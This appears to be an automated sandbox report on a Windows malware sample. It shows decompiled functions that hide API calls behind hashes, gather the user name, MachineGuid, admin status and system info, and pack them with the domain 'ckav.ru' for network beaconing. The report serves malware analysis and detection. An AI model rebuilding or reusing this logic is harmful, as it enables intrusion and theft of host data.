                                              							E00404DE5(_t24,  *_t43);
                                              							 *_t43 = _t31;
                                              						}
                                              						__imp__freeaddrinfo(_v8);
                                              						if( *_t43 != _t31) {
                                              							_t25 = _t43;
                                              							goto L10;
                                              						} else {
                                              							E00402BAB(_t43);
                                              							L8:
                                              							_t25 = 0;
                                              							L10:
                                              							return _t25;
                                              						}
                                              					}
                                              					E00402BAB(_t43);
                                              					__imp__freeaddrinfo(_v8);
                                              					goto L8;
                                              				}
                                              				return 0;
                                              			}


















                                              APIs
                                              • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                                              • socket.WS2_32(?,?,?), ref: 00404E7A
                                              • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: freeaddrinfogetaddrinfosocket
                                              • String ID:
                                              • API String ID: 2479546573-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 74%
                                              			E004040BB(void* __eflags, WCHAR* _a4, long* _a8, intOrPtr _a12) {
                                              				struct _SECURITY_ATTRIBUTES* _v8;
                                              				char _v12;
                                              				long _v16;
                                              				void* __ebx;
                                              				void* __edi;
                                              				void* _t16;
                                              				intOrPtr* _t25;
                                              				long* _t28;
                                              				void* _t30;
                                              				int _t32;
                                              				intOrPtr* _t33;
                                              				void* _t35;
                                              				void* _t42;
                                              				intOrPtr _t43;
                                              				long _t44;
                                              				struct _OVERLAPPED* _t46;
                                              
                                              				_t46 = 0;
                                              				_t35 = 0;
                                              				E004031E5(0, 0, 0xe9fabb88, 0, 0);
                                              				_t16 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0); // executed
                                              				_t42 = _t16;
                                              				_v8 = _t42;
                                              				if(_t42 == 0xffffffff) {
                                              					__eflags = _a12;
                                              					if(_a12 == 0) {
                                              						L10:
                                              						return _t35;
                                              					}
                                              					_t43 = E00403C90(_t42, L".tmp", 0, 0, 0x1a);
                                              					__eflags = _t43;
                                              					if(_t43 == 0) {
                                              						goto L10;
                                              					}
                                              					_push(0);
                                              					__eflags = E00403C59(_a4, _t43);
                                              					if(__eflags != 0) {
                                              						_v8 = 0;
                                              						_t46 = E004040BB(__eflags, _t43,  &_v8, 0);
                                              						_push(_t43);
                                              						 *_a8 = _v8;
                                              						E00403D44();
                                              					}
                                              					E00402BAB(_t43);
                                              					return _t46;
                                              				}
                                              				_t25 = E004031E5(0, 0, 0xf9435d1e, 0, 0);
                                              				_t44 =  *_t25(_t42,  &_v12);
                                              				if(_v12 != 0 || _t44 > 0x40000000) {
                                              					L8:
                                              					_t45 = _v8;
                                              					goto L9;
                                              				} else {
                                              					_t28 = _a8;
                                              					if(_t28 != 0) {
                                              						 *_t28 = _t44;
                                              					}
                                              					E004031E5(_t35, _t46, 0xd4ead4e2, _t46, _t46);
                                              					_t30 = VirtualAlloc(_t46, _t44, 0x1000, 4); // executed
                                              					_t35 = _t30;
                                              					if(_t35 == 0) {
                                              						goto L8;
                                              					} else {
                                              						E004031E5(_t35, _t46, 0xcd0c9940, _t46, _t46);
                                              						_t45 = _v8;
                                              						_t32 = ReadFile(_v8, _t35, _t44,  &_v16, _t46); // executed
                                              						if(_t32 == 0) {
                                              							_t33 = E004031E5(_t35, _t46, 0xf53ecacb, _t46, _t46);
                                              							 *_t33(_t35, _t46, 0x8000);
                                              							_t35 = _t46;
                                              						}
                                              						L9:
                                              						E00403C40(_t45); // executed
                                              						goto L10;
                                              					}
                                              				}
                                              			}




















                                              APIs
                                              • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
                                              • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
                                              • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: File$AllocCreateReadVirtual
                                              • String ID: .tmp
                                              • API String ID: 3585551309-2986845003
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 79%
                                              			E00413866(void* __eflags) {
                                              				short _v6;
                                              				short _v8;
                                              				short _v10;
                                              				short _v12;
                                              				short _v14;
                                              				short _v16;
                                              				short _v18;
                                              				short _v20;
                                              				short _v22;
                                              				char _v24;
                                              				short _v28;
                                              				short _v30;
                                              				short _v32;
                                              				short _v34;
                                              				short _v36;
                                              				short _v38;
                                              				short _v40;
                                              				short _v42;
                                              				short _v44;
                                              				short _v46;
                                              				char _v48;
                                              				short _v52;
                                              				short _v54;
                                              				short _v56;
                                              				short _v58;
                                              				short _v60;
                                              				short _v62;
                                              				short _v64;
                                              				short _v66;
                                              				short _v68;
                                              				short _v70;
                                              				short _v72;
                                              				short _v74;
                                              				char _v76;
                                              				void* __ebx;
                                              				void* __edi;
                                              				void* _t38;
                                              				short _t43;
                                              				short _t44;
                                              				short _t45;
                                              				short _t46;
                                              				short _t47;
                                              				short _t48;
                                              				short _t50;
                                              				short _t51;
                                              				short _t52;
                                              				short _t54;
                                              				short _t55;
                                              				intOrPtr* _t57;
                                              				intOrPtr* _t59;
                                              				intOrPtr* _t61;
                                              				void* _t63;
                                              				WCHAR* _t65;
                                              				long _t68;
                                              				void* _t75;
                                              				short _t76;
                                              				short _t78;
                                              				short _t83;
                                              				short _t84;
                                              				short _t85;
                                              
                                              				E00402C6C(_t38);
                                              				E004031E5(_t75, 0, 0xd1e96fcd, 0, 0);
                                              				SetErrorMode(3); // executed
                                              				_t43 = 0x4f;
                                              				_v76 = _t43;
                                              				_t44 = 0x4c;
                                              				_v74 = _t44;
                                              				_t45 = 0x45;
                                              				_v72 = _t45;
                                              				_t46 = 0x41;
                                              				_v70 = _t46;
                                              				_t47 = 0x55;
                                              				_v68 = _t47;
                                              				_t48 = 0x54;
                                              				_t76 = 0x33;
                                              				_t84 = 0x32;
                                              				_t83 = 0x2e;
                                              				_t78 = 0x64;
                                              				_t85 = 0x6c;
                                              				_v66 = _t48;
                                              				_v52 = 0;
                                              				_t50 = 0x77;
                                              				_v48 = _t50;
                                              				_t51 = 0x73;
                                              				_v46 = _t51;
                                              				_t52 = 0x5f;
                                              				_v42 = _t52;
                                              				_v28 = 0;
                                              				_t54 = 0x6f;
                                              				_v24 = _t54;
                                              				_t55 = 0x65;
                                              				_v20 = _t55;
                                              				_v64 = _t76;
                                              				_v62 = _t84;
                                              				_v60 = _t83;
                                              				_v58 = _t78;
                                              				_v56 = _t85;
                                              				_v54 = _t85;
                                              				_v44 = _t84;
                                              				_v40 = _t76;
                                              				_v38 = _t84;
                                              				_v36 = _t83;
                                              				_v34 = _t78;
                                              				_v32 = _t85;
                                              				_v30 = _t85;
                                              				_v22 = _t85;
                                              				_v18 = _t76;
                                              				_v16 = _t84;
                                              				_v14 = _t83;
                                              				_v12 = _t78;
                                              				_v10 = _t85;
                                              				_v8 = _t85;
                                              				_v6 = 0;
                                              				_t57 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
                                              				 *_t57( &_v76);
                                              				_t59 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
                                              				 *_t59( &_v48);
                                              				_t61 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
                                              				_t81 =  &_v24;
                                              				 *_t61( &_v24); // executed
                                              				_t63 = E00414059(); // executed
                                              				if(_t63 != 0) {
                                              					_t65 = E00413D97(0);
                                              					E004031E5(0, 0, 0xcf167df4, 0, 0);
                                              					CreateMutexW(0, 1, _t65); // executed
                                              					_t68 = GetLastError();
                                              					_t92 = _t68 - 0xb7;
                                              					if(_t68 == 0xb7) {
                                              						E00413B81(0);
                                              						_pop(_t81); // executed
                                              					}
                                              					E00413003(_t92); // executed
                                              					E00412B2E(_t92); // executed
                                              					E00412D31(_t81, _t84); // executed
                                              					E00413B3F();
                                              					E00413B81(0);
                                              					 *0x49fdd0 = 1;
                                              				}
                                              				return 0;
                                              			}

                                              APIs
                                              • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                                              • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                                              • GetLastError.KERNEL32 ref: 0041399E
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: Error$CreateLastModeMutex
                                              • String ID:
                                              • API String ID: 3448925889-0
                                              • Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                              • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                                              • Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                              • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E004042CF(void* __ebx, void* __eflags, WCHAR* _a4, void* _a8, long _a12) {
                                              				long _v8;
                                              				void* _t7;
                                              				long _t10;
                                              				void* _t21;
                                              				struct _OVERLAPPED* _t24;
                                              
                                              				_t14 = __ebx;
                                              				_t24 = 0;
                                              				_v8 = 0;
                                              				E004031E5(__ebx, 0, 0xe9fabb88, 0, 0);
                                              				_t7 = CreateFileW(_a4, 0xc0000000, 0, 0, 4, 0x80, 0); // executed
                                              				_t21 = _t7;
                                              				if(_t21 != 0xffffffff) {
                                              					E004031E5(__ebx, 0, 0xeebaae5b, 0, 0);
                                              					_t10 = SetFilePointer(_t21, 0, 0, 2); // executed
                                              					if(_t10 != 0xffffffff) {
                                              						E004031E5(_t14, 0, 0xc148f916, 0, 0);
                                              						WriteFile(_t21, _a8, _a12,  &_v8, 0); // executed
                                              						_t24 =  !=  ? 1 : 0;
                                              					}
                                              					E00403C40(_t21); // executed
                                              				}
                                              				return _t24;
                                              			}

                                              APIs
                                              • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
                                              • WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: File$CreatePointerWrite
                                              • String ID:
                                              • API String ID: 3672724799-0
                                              • Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                              • Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
                                              • Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                              • Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 34%
                                              			E00412D31(void* __ecx, void* __edi) {
                                              				long _v8;
                                              				intOrPtr _v12;
                                              				intOrPtr _v16;
                                              				intOrPtr _v20;
                                              				char _v24;
                                              				char _v40;
                                              				void* __ebx;
                                              				intOrPtr* _t10;
                                              				void* _t11;
                                              				void* _t25;
                                              				void* _t26;
                                              				void* _t27;
                                              				void* _t35;
                                              				void* _t53;
                                              				char* _t57;
                                              				void* _t58;
                                              				void* _t61;
                                              				void* _t64;
                                              				void* _t65;
                                              				intOrPtr* _t66;
                                              				void* _t67;
                                              				void* _t68;
                                              				void* _t69;
                                              				void* _t70;
                                              				void* _t71;
                                              				void* _t72;
                                              				void* _t73;
                                              
                                              				_t53 = __ecx;
                                              				_t10 =  *0x49fde0;
                                              				_t68 = _t67 - 0x24;
                                              				 *0x49fddc = 0x927c0;
                                              				 *0x49fde4 = 0;
                                              				_t75 = _t10;
                                              				if(_t10 != 0) {
                                              					L16:
                                              					_push(1);
                                              					_t11 = E004141A7(_t80,  *_t10,  *((intOrPtr*)(_t10 + 8))); // executed
                                              					_t61 = _t11;
                                              					_t68 = _t68 + 0xc;
                                              					if(_t61 != 0) {
                                              						E004031E5(0, 0, 0xfcae4162, 0, 0);
                                              						CreateThread(0, 0, E0041289A, _t61, 0,  &_v8); // executed
                                              					}
                                              					L004067C4(0xea60); // executed
                                              					_pop(_t53);
                                              				} else {
                                              					_push(__edi);
                                              					 *0x49fde0 = E004056BF(0x2bc);
                                              					E00413DB7(_t53, _t75,  &_v40);
                                              					_t57 =  &_v24;
                                              					asm("movsd");
                                              					asm("movsd");
                                              					asm("movsd");
                                              					asm("movsd");
                                              					E004058D4( *0x49fde0, 0x12);
                                              					E004058D4( *0x49fde0, 0x28);
                                              					E00405872( *0x49fde0, "ckav.ru", 0, 0);
                                              					_t69 = _t68 + 0x28;
                                              					_t64 = E0040632F();
                                              					_push(0);
                                              					_push(1);
                                              					if(_t64 == 0) {
                                              						_push(0);
                                              						_push( *0x49fde0);
                                              						E00405872();
                                              						_t70 = _t69 + 0x10;
                                              					} else {
                                              						_push(_t64);
                                              						_push( *0x49fde0);
                                              						E00405872();
                                              						E00402BAB(_t64);
                                              						_t70 = _t69 + 0x14;
                                              					}
                                              					_t58 = E00406130(_t57);
                                              					_push(0);
                                              					_push(1);
                                              					_t77 = _t64;
                                              					if(_t64 == 0) {
                                              						_push(0);
                                              						_push( *0x49fde0);
                                              						_t25 = E00405872();
                                              						_t71 = _t70 + 0x10; // executed
                                              					} else {
                                              						_push(_t58);
                                              						_push( *0x49fde0);
                                              						E00405872();
                                              						_t25 = E00402BAB(_t58);
                                              						_t71 = _t70 + 0x14;
                                              					}
                                              					_t26 = E004061C3(_t25, 0, _t77); // executed
                                              					_t65 = _t26;
                                              					_push(0);
                                              					_push(1);
                                              					if(_t65 == 0) {
                                              						_push(0);
                                              						_push( *0x49fde0);
                                              						_t27 = E00405872();
                                              						_t72 = _t71 + 0x10;
                                              					} else {
                                              						_push(_t65);
                                              						_push( *0x49fde0);
                                              						E00405872();
                                              						_t27 = E00402BAB(_t65);
                                              						_t72 = _t71 + 0x14;
                                              					}
                                              					_t66 = E00406189(_t27);
                                              					_t79 = _t66;
                                              					if(_t66 == 0) {
                                              						E00405781( *0x49fde0, 0);
                                              						E00405781( *0x49fde0, 0);
                                              						_t73 = _t72 + 0x10;
                                              					} else {
                                              						E00405781( *0x49fde0,  *_t66);
                                              						E00405781( *0x49fde0,  *((intOrPtr*)(_t66 + 4)));
                                              						E00402BAB(_t66);
                                              						_t73 = _t72 + 0x14;
                                              					}
                                              					E004058D4( *0x49fde0, E004063B2(0, _t53, _t79));
                                              					E004058D4( *0x49fde0, E004060BD(_t79)); // executed
                                              					_t35 = E0040642C(_t79); // executed
                                              					E004058D4( *0x49fde0, _t35);
                                              					E004058D4( *0x49fde0, _v24);
                                              					E004058D4( *0x49fde0, _v20);
                                              					E004058D4( *0x49fde0, _v16);
                                              					E004058D4( *0x49fde0, _v12);
                                              					E00405872( *0x49fde0, E00413D97(0), 1, 0);
                                              					_t68 = _t73 + 0x48;
                                              				}
                                              				_t80 =  *0x49fde4;
                                              				if( *0x49fde4 == 0) {
                                              					_t10 =  *0x49fde0;
                                              					goto L16;
                                              				}
                                              				return E00405695(_t53,  *0x49fde0);
                                              			}

                                              APIs
                                              • CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53
                                                • Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F
                                                • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                                                • Part of subcall function 00402BAB: RtlFreeHeap.NTDLL(00000000), ref: 00402BC0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$CreateFreeProcessThread_wmemset
                                              • String ID: ckav.ru
                                              • API String ID: 2915393847-2696028687
                                              • Opcode ID: d166330210f886f258cea0f95f040112802ba461a537879de6ad45a462bfc85e
                                              • Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
                                              • Opcode Fuzzy Hash: d166330210f886f258cea0f95f040112802ba461a537879de6ad45a462bfc85e
                                              • Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E0040632F() {
                                              				char _v8;
                                              				void* _t4;
                                              				void* _t7;
                                              				void* _t16;
                                              
                                              				_t16 = E00402B7C(0x208);
                                              				if(_t16 == 0) {
                                              					L4:
                                              					_t4 = 0;
                                              				} else {
                                              					E0040338C(_t16, 0, 0x104);
                                              					_t1 =  &_v8; // 0x4143e8
                                              					_v8 = 0x208;
                                              					_t7 = E00406069(_t16, _t1); // executed
                                              					if(_t7 == 0) {
                                              						E00402BAB(_t16);
                                              						goto L4;
                                              					} else {
                                              						_t4 = _t16;
                                              					}
                                              				}
                                              				return _t4;
                                              			}








                                              APIs
                                                • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                              • _wmemset.LIBCMT ref: 0040634F
                                                • Part of subcall function 00406069: GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocateNameProcessUser_wmemset
                                              • String ID: CA
                                              • API String ID: 2078537776-1052703068
                                              • Opcode ID: f2258d9b8330d324457b64b56ec83946477e708dba813dda8b6774b529cb1dca
                                              • Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
                                              • Opcode Fuzzy Hash: f2258d9b8330d324457b64b56ec83946477e708dba813dda8b6774b529cb1dca
                                              • Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E00406086(void* _a4, union _TOKEN_INFORMATION_CLASS _a8, void* _a12, long _a16, DWORD* _a20) {
                                              				int _t7;
                                              				void* _t8;
                                              
                                              				E004031E5(_t8, 9, 0xecae3497, 0, 0);
                                              				_t7 = GetTokenInformation(_a4, _a8, _a12, _a16, _a20); // executed
                                              				return _t7;
                                              			}






                                              APIs
                                              • GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: InformationToken
                                              • String ID: IDA
                                              • API String ID: 4114910276-365204570
                                              • Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                              • Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
                                              • Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                              • Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E00402C03(struct HINSTANCE__* _a4, char _a8) {
                                              				_Unknown_base(*)()* _t5;
                                              				void* _t6;
                                              
                                              				E004031E5(_t6, 0, 0xceb18abc, 0, 0);
                                              				_t1 =  &_a8; // 0x403173
                                              				_t5 = GetProcAddress(_a4,  *_t1); // executed
                                              				return _t5;
                                              			}






                                              APIs
                                              • GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: AddressProc
                                              • String ID: s1@
                                              • API String ID: 190572456-427247929
                                              • Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                              • Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
                                              • Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                              • Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 92%
                                              			E00404A52(void* _a4, char* _a8, char* _a12) {
                                              				void* _v8;
                                              				int _v12;
                                              				void* __ebx;
                                              				char* _t10;
                                              				long _t13;
                                              				char* _t27;
                                              
                                              				_push(_t21);
                                              				_t27 = E00402B7C(0x208);
                                              				if(_t27 == 0) {
                                              					L4:
                                              					_t10 = 0;
                                              				} else {
                                              					E00402B4E(_t27, 0, 0x208);
                                              					_v12 = 0x208;
                                              					E004031E5(0, 9, 0xf4b4acdc, 0, 0);
                                              					_t13 = RegOpenKeyExA(_a4, _a8, 0, 0x20119,  &_v8); // executed
                                              					if(_t13 != 0) {
                                              						E00402BAB(_t27);
                                              						goto L4;
                                              					} else {
                                              						E004031E5(0, 9, 0xfe9f661a, 0, 0);
                                              						RegQueryValueExA(_v8, _a12, 0, 0, _t27,  &_v12); // executed
                                              						E00404A39(_v8); // executed
                                              						_t10 = _t27;
                                              					}
                                              				}
                                              				return _t10;
                                              			}










                                              APIs
                                                • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                              • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                                              • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocateOpenProcessQueryValue
                                              • String ID:
                                              • API String ID: 1425999871-0
                                              • Opcode ID: 8a65b5e102e28de28ef59c05438bd133f995ad554f34eb9b6244912b3c07c856
                                              • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                                              • Opcode Fuzzy Hash: 8a65b5e102e28de28ef59c05438bd133f995ad554f34eb9b6244912b3c07c856
                                              • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E00402BAB(void* _a4) {
                                              				void* _t3;
                                              				char _t5;
                                              
                                              				if(_a4 != 0) {
                                              					_t5 = RtlFreeHeap(GetProcessHeap(), 0, _a4); // executed
                                              					return _t5;
                                              				}
                                              				return _t3;
                                              			}






                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                                              • RtlFreeHeap.NTDLL(00000000), ref: 00402BC0
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$FreeProcess
                                              • String ID:
                                              • API String ID: 3859560861-0
                                              • Opcode ID: 0ab6f2dbedfa6cb862415dde11aab857cc1d2c8de5bdcfad433bf240e63de12c
                                              • Instruction ID: 8dd5a347e09044be93d5ac0bfd75615970d35e99714971ab129ae27a0189db5c
                                              • Opcode Fuzzy Hash: 0ab6f2dbedfa6cb862415dde11aab857cc1d2c8de5bdcfad433bf240e63de12c
                                              • Instruction Fuzzy Hash: 7FC01235000A08EBCB001FD0E90CBE93F6CAB8838AF808020B60C480A0C6B49090CAA8
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 40%
                                              			E004060BD(void* __eflags) {
                                              				signed int _v8;
                                              				char _v12;
                                              				short _v16;
                                              				char _v20;
                                              				void* __ebx;
                                              				intOrPtr* _t12;
                                              				signed int _t13;
                                              				intOrPtr* _t14;
                                              				signed int _t15;
                                              				void* _t24;
                                              
                                              				_v16 = 0x500;
                                              				_v20 = 0;
                                              				_t12 = E004031E5(0, 9, 0xf3a0c470, 0, 0);
                                              				_t13 =  *_t12( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
                                              				_v8 = _t13;
                                              				if(_t13 != 0) {
                                              					_t14 = E004031E5(0, 9, 0xe3b938df, 0, 0);
                                              					_t15 =  *_t14(0, _v12,  &_v8, _t24); // executed
                                              					asm("sbb eax, eax");
                                              					_v8 = _v8 &  ~_t15;
                                              					E0040604F(_v12);
                                              					return _v8;
                                              				}
                                              				return _t13;
                                              			}














                                              APIs
                                              • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: CheckMembershipToken
                                              • String ID:
                                              • API String ID: 1351025785-0
                                              • Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                              • Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
                                              • Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                              • Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E00403C62(void* __ebx, void* __eflags, WCHAR* _a4) {
                                              				void* _t3;
                                              				int _t5;
                                              
                                              				_t3 = E00403D4D(__eflags, _a4); // executed
                                              				if(_t3 == 0) {
                                              					__eflags = 0;
                                              					E004031E5(__ebx, 0, 0xc8f0a74d, 0, 0);
                                              					_t5 = CreateDirectoryW(_a4, 0); // executed
                                              					return _t5;
                                              				} else {
                                              					return 1;
                                              				}
                                              			}






                                              APIs
                                              • CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: CreateDirectory
                                              • String ID:
                                              • API String ID: 4241100979-0
                                              • Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                              • Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
                                              • Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                              • Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 37%
                                              			E0040642C(void* __eflags) {
                                              				short _v40;
                                              				intOrPtr* _t6;
                                              				void* _t10;
                                              
                                              				_t6 = E004031E5(_t10, 0, 0xe9af4586, 0, 0);
                                              				 *_t6( &_v40); // executed
                                              				return 0 | _v40 == 0x00000009;
                                              			}







                                              APIs
                                              • GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445
                                              Memory Dump Source
